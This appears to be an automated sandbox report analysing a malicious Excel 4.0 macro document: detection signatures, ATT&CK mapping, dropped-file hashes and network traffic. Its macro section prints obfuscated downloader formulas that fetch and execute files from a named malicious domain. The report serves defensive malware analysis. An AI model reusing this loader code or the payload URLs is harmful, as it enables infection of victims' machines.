Play interactive tourEdit tour
Analysis Report Document1094680387_02012021.xls
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
| |
JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security |
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Multi AV Scanner detection for domain / URL | Show sources |
Source: | Virustotal: | Perma Link | ||
Source: | Virustotal: | Perma Link |
Compliance: |
---|
Uses new MSVCR Dlls | Show sources |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: | Jump to behavior |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | HTTP traffic detected: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion: |
---|
Yara detected hidden Macro 4.0 in Excel | Show sources |
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting1 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
8% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
healthymachinery.com | 172.67.149.197 | true | true |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
172.67.149.197 | unknown | United States | 13335 | CLOUDFLARENETUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 356299 |
Start date: | 22.02.2021 |
Start time: | 21:42:12 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 23s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Document1094680387_02012021.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.expl.evad.winXLS@3/8@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4318 |
Entropy (8bit): | 4.978706497143023 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1fiPvJADh/pRscs1szbGD:1j9jhjYjWK/lyH+k0RADh/pmcs1sfGD |
MD5: | 2885250688BD4C1C1BB0ABE37E258DDC |
SHA1: | A0C1355880E29CA2B53A875CB3C296FA6E7EA829 |
SHA-256: | BE620E05FC49EFF7529785A5D8B96E40B9F1668BBC80B7C33EC46453DEBB3AE4 |
SHA-512: | BD118277C49F05C733EEBD7F674877749639EC64D9C55ADAA72E3DDFB669EECF83F8D9238C53F7C92FF9702D5C8218F3799335E6FBDE36BE964B0AA243E97364 |
Malicious: | false |
Reputation: | low |
IE Cache URL: | http://healthymachinery.com/health/32-422-76.assp |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 26497 |
Entropy (8bit): | 7.568364582865906 |
Encrypted: | false |
SSDEEP: | 384:1nnowDuBP+y+mjZ0VTquDznB3dPjZ8aoVT0QNuzWKPqGndVVBdd:1nnlDuBP+Tmje3nXPj6W+u7qkPLdd |
MD5: | F3B6E4C5C9FA1158B6FAC9252C28F970 |
SHA1: | 0EF9E1DCD12EE01EB92F610564D8AEB7F1F67A98 |
SHA-256: | 569F33677C782BF3A4C8421D4F3C6A76BEEBB41DD2FD3D845C37193758254461 |
SHA-512: | D3C42FBAEBE32348686ADFCCA0E00E3EC2F3977DCAA0C74BAE0200A835993113D0112B017CACECBD884B4B4FD542257144F26C06D679A3E8514B7C641940B7AE |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.468842484038273 |
Encrypted: | false |
SSDEEP: | 12:85Qc0LgXg/XAlCPCHaXgzB8IB/iGkZX+Wnicvb4AubDtZ3YilMMEpxRljKXlcTdK:85Zi/XTwz6IAjYekAiDv3qPrNru/ |
MD5: | E382379E6F8EC21891A4C09FC78B2C33 |
SHA1: | 81B9B99F3BF9B4519E6ED6013413BF3327D48BF3 |
SHA-256: | 657B78085B6180BD0BADC5FF6667219E2DF14FC6FC2FA0A0A4F1F550AF56C650 |
SHA-512: | 53FD2827C93CB851ED840261AE22E4BEEC4D398B091B823C95D7F8EF092FCFD3998612EB1866F694502555110424FF591234D659DF437E9DB1A3EFB1521872A0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2198 |
Entropy (8bit): | 4.500480590351624 |
Encrypted: | false |
SSDEEP: | 24:8HYn/XTwz6I4U8WcqFekAxqZDv3qPdM7dD2HYn/XTwz6I4U8WcqFekAxqZDv3qPg:8M/XT3Ing+YJPQh2M/XT3Ing+YJPQ/ |
MD5: | 401E0C09D6A3D5BFFF6B567EC7699127 |
SHA1: | 2D7471A620659CF28658DD30702654F86E33A703 |
SHA-256: | BB865549E2FD35FE53C099CBFF8746859936D9F6706558D4860DAA8B0D134E19 |
SHA-512: | 0018087D2F3EAF6D42CE5E01C82F38AE074D4D6FB6F0E2CAB1AAC6B23E153474C42F2A669F8AC6897DA8679A6290202F39F65D70584CE860084F868DD9561772 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134 |
Entropy (8bit): | 4.703385008978903 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMUdRRMJ9+XVEAl5S/dRRMJ9+XVEAlmMUdRRMJ9+XVEAlv:dj6zJVArS6JVAxzJVA1 |
MD5: | 5DBCC3E3BA539EAC9E456E71F44E7F4C |
SHA1: | 26A9F73B250A22119F585C58096C6DC174B354BD |
SHA-256: | 05CEF3F9B120D1E67A3F7A67F8578A2EE56E1060EAC5FFDF8F572BB4834127B7 |
SHA-512: | 48814DA9A0B6A1A2EFEF65B0FA6617508E2514227CC48B215F3716412375C072A8FD97C3A9EC54463E3A4DAAE0CA9BC26D4D5686D5DEED9F6CAF12B63F7D54C4 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 122 |
Entropy (8bit): | 4.5618514532497425 |
Encrypted: | false |
SSDEEP: | 3:GmM/5DyQiqWyD0XQvHU8VXT7OHHRESNSRcuRYigjmXReWpD:XM/5DD1D3JuHS3cuKjmUWpD |
MD5: | D84B2823208AF224D4942EC7FD77CBBF |
SHA1: | 8D9C717B32324F197502E20EFBB1C3763DADF579 |
SHA-256: | DECCE67F750C39C9B6D2E721D97DA196327CF7DFA3EFF790508D756D969F7739 |
SHA-512: | 51CA3F9B77C8B41E2EAAACCE191D11AA08663F7C208A56B55D998FCA9B9B4BD28C457F9BEBD6112272D17A9682C8C19A2257E3E3646613B1912333D88FA6BBEB |
Malicious: | false |
Reputation: | low |
IE Cache URL: | healthymachinery.com/ |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 69069 |
Entropy (8bit): | 6.230482106115366 |
Encrypted: | false |
SSDEEP: | 1536:nZ8rmjAItyzElBIL6lECbgBGGP5xLmQWVxdEfq6PkHZ8rmjAItyzElBIL6lECbgT:nZ8rmjAItyzElBIL6lECbgBGGP5xLm7W |
MD5: | 7C0537F4EBF1358F614989AABC178980 |
SHA1: | 0376B456E68893C84F61273EF06BC7D12FE22ED8 |
SHA-256: | 0DB14CEF15D668DC42C8AD731EB42B0CDCB21E33D3D3C1AFA9010805EB725F9A |
SHA-512: | 38D05E80CCDA7B63F291E068291430D9F9B2E0EDDD440ACD0C9E461A88E10BE894C17E786EC793CE2113BCA9778E6B26F0BAD2C59E9D826C6A354483AF823F4C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4318 |
Entropy (8bit): | 4.978706497143023 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1fiPvJADh/pRscs1szbGD:1j9jhjYjWK/lyH+k0RADh/pmcs1sfGD |
MD5: | 2885250688BD4C1C1BB0ABE37E258DDC |
SHA1: | A0C1355880E29CA2B53A875CB3C296FA6E7EA829 |
SHA-256: | BE620E05FC49EFF7529785A5D8B96E40B9F1668BBC80B7C33EC46453DEBB3AE4 |
SHA-512: | BD118277C49F05C733EEBD7F674877749639EC64D9C55ADAA72E3DDFB669EECF83F8D9238C53F7C92FF9702D5C8218F3799335E6FBDE36BE964B0AA243E97364 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.9082210251254503 |
TrID: |
|
File name: | Document1094680387_02012021.xls |
File size: | 64512 |
MD5: | 9423ee9775707d51960e0eac95b3f6cc |
SHA1: | debc0defc997fde77a2f0cee9b3b1fcbed54ea91 |
SHA256: | 7034e21128da9ce58c2d5249d3fd73dd766cf90437fa52f79faa50098f359634 |
SHA512: | 0cff3519c5453bdeb13201849c571cbb142ed6780c2e6cae572104904af1190ff4d4e068ff0109953745b153fc219c618519318cadd4dcac300b3d280643bc53 |
SSDEEP: | 1536:TcPiTQAVW/89BQnmlcGvgZ6GrvhpJ8YUOMUt/BI/s/Vk/OZ/R/7/Gm/UQ/OhGW/x:TcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOA |
File Content Preview: | ........................>.......................|...........................{.................................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "Document1094680387_02012021.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-01 14:40:50 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.292801571342 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . B a s e . . . . . K l o p s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b0 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 70 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.271885406754 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 54588 |
---|
General | |
---|---|
Stream Path: | Book |
File Type: | Applesoft BASIC program data, first line number 8 |
Stream Size: | 54588 |
Entropy: | 4.12824675227 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . Y u Z h o u L e e B . . . . . . . . . . . . . . . . . . . . . . . K l o p s . . . . . . . . . . . . . . . . . . N i o k a s e r . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 0b 59 75 20 5a 68 6f 75 20 4c 65 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Macro 4.0 Code |
---|
,,,,,,,,,,"=EXEC(""r""&Base!V56&"" ""&Base!V55&"",D""&Base!V57)",,"=REGISTER(Base!W51&Base!W52&Base!W53&Base!W54&Base!W55&Base!W56,Base!X50&Base!X51&Base!X52&Base!X53&Base!X54&Base!X55&Base!X56&Base!X57&Base!X58&Base!X59&Base!X60&Base!X61&Base!X62&Base!X63&Base!X64&Base!X65&Base!X66&Base!X67,Base!W59&Base!W60&Base!W61&Base!W62&Base!W63&Base!W64,Base!W66,,1,9)"=C153(),,,"=Niokaser(0,""h""&Base!V54&C166&B170,Base!V55,0,0)",,,"=Niokaser(0,Base!V54&C167&B170,Base!V55&""1"",0,0)",,,"=Niokaser(0,Base!V54&C168&B170,Base!V55&""2"",0,0)",,,"=Niokaser(0,Base!V54&C169&B170,Base!V55&""3"",0,0)",,,"=Niokaser(0,Base!V54&C170&B170,Base!V55&""4"",0,0)",,,,,,,,,,,,,,,,=HALT(),=GOTO(D153),=GOTO(B153),,,,,healthymachinery.com/health/32-422-76.assp,,,healthymachinery.com/health/56754.fdre,,,healthymachinery.com/health/56754.fdre,,,healthymachinery.com/health/56754.fdre,,,healthymachinery.com/health/56754.fdre,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 22, 2021 21:43:00.961786985 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
Feb 22, 2021 21:43:01.016254902 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:43:01.016521931 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
Feb 22, 2021 21:43:01.017865896 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
Feb 22, 2021 21:43:01.071145058 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:43:01.097974062 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:43:01.098009109 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:43:01.098030090 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:43:01.098244905 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
Feb 22, 2021 21:45:00.816421986 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
Feb 22, 2021 21:45:00.870547056 CET | 80 | 49165 | 172.67.149.197 | 192.168.2.22 |
Feb 22, 2021 21:45:00.870827913 CET | 49165 | 80 | 192.168.2.22 | 172.67.149.197 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Feb 22, 2021 21:43:00.876825094 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Feb 22, 2021 21:43:00.938873053 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Feb 22, 2021 21:43:00.876825094 CET | 192.168.2.22 | 8.8.8.8 | 0x78b6 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Feb 22, 2021 21:43:00.938873053 CET | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | 172.67.149.197 | A (IP address) | IN (0x0001) | ||
Feb 22, 2021 21:43:00.938873053 CET | 8.8.8.8 | 192.168.2.22 | 0x78b6 | No error (0) | 104.21.29.200 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 172.67.149.197 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 22, 2021 21:43:01.017865896 CET | 0 | OUT | |
Feb 22, 2021 21:43:01.097974062 CET | 2 | IN |